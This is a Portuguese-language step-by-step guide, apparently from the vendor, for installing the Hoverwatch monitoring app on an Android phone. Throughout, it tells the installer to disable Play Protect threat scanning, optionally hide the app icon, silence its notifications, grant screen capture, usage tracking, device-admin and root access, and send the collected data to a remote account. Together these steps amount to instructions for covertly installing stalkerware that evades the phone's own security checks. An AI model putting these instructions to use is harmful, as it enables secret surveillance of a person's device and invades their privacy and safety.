Como Instalar Hoverwatch para Android

Instrução em vídeo:

Instrução em texto:

1. Prepare seu celular escolhido:

Para prevenir que o Android faça perguntas sobre a atividade do programa de monitoramento:

Abra o aplicativo "Play Store" -> clique em Menu -> selecione "Play Protect" -> clique no ícone de Configurações / Settings .
Desabilite "Escanear dispositivo para ameaças de segurança / Scan device for security threats" e "Melhorar detecção de aplicativos prejudiciais / Improve harmful app detections".

2. Baixe o Aplicativo

Abra seu navegador. Ligue o "Modo privado / Secret mode", se você desejar. Digite hoverwatch.com. Digite seu email e senha (crie uma conta no Hoverwatch) e clique em "INSCREVER DE GRAÇA / SIGN UP FREE".

Selecione Android e clique no link de download.

Clique em "Baixar / Download".

Clique em "Abrir arquivo / Open file".

Se você não conseguir encontrar a página "Adicionar Dispositivo / Add Device", clique no botão "Menu" depois clique em "Adicionar Dispositivo / Add Device".

3. Instale o aplicativo

Clique em "Configurações / Settings" e permita a instalação do aplicativo.

Clique em "Voltar / Back".Clique em Instalar / Install.

Se o botão "Abrir" não estiver ativo, siga as instruções..

Selecione a opção de instalação e clique em OK.

Dependendo de sua escolha, você pode escolher esconder o ícone do Hoverwatch.

Aceite os termos legais / legal terms.

Digite seu login e senha de sua conta no Hoverwatch. Clique em Ativar / Activate.

Ativar todas as permissões do aplicativo:

Clique em "SIM / YES" e clique em "Permitir / Allow" para ativar todas as permissões.

Desabilitar a otimização da bateria:

Toque no botão "Sim / Yes". Pressione o botão "Permitir / Allow".

Ative a permissão "Aparecer no topo / Appear on top":

Toque no botão "Sim / Yes", ative "Permitir permissão / Allow permission". Pressione o botão "Voltar / Back".

Permitir que o aplicativo capture a tela:

Clique em "SIM / YES".

Habilitar o item "Habilitar o item / Don`t show again". Clique no botão "Começar agora / Start now".

Ative "Registro de uso / Usage tracking":

Registro de uso "Sim / Yes", encontre e clique em "Serviço de Sincronização / Sync Service", ative "Permitir registro de uso / Allow usage tracking".

002.jpg 003.jpg

Clique no botão "voltar / back" duas vezes e retorne ao aplicativo Hoverwatch.

Desativar notificações de aplicativos / app notifications:

Toque no botão "Sim / Yes". Desativar "Mostrar notificações / Show notifications".

5.1.jpg 5.2.jpg

Toque no botão "voltar / back" e retorne ao aplicativo Hoverwatch.

Ative o administrador do dispositivo / Device admin:

Toque no botão "Sim / Yes" na nova mensagem, toque no botão "Ativar / Activate"

4. Verifique as configurações adicionais

Se seu celular não foi roteado, está tudo certo.

Se seu celular foi roteado, durante a instalação, o programa fará mais algumas perguntas.

Quando ele perguntar se deve reiniciar, responda "Sim / Yes".

Em "Pedido de Permissão de Root" lembre-se de marcar a caixa "Não perguntar de novo", depois clique em "Autorizar / Authorize".

Por favor, verifique se seu dispositivo está rooteado corretamente com qualquer Root Checker gratuito da Google Play Store.

O programa começará a funcionar depois de seu computador ser reiniciado.

Em 5-6 minutos, as informações do aparelho aparecerão em sua conta no Hoverwatch.

show up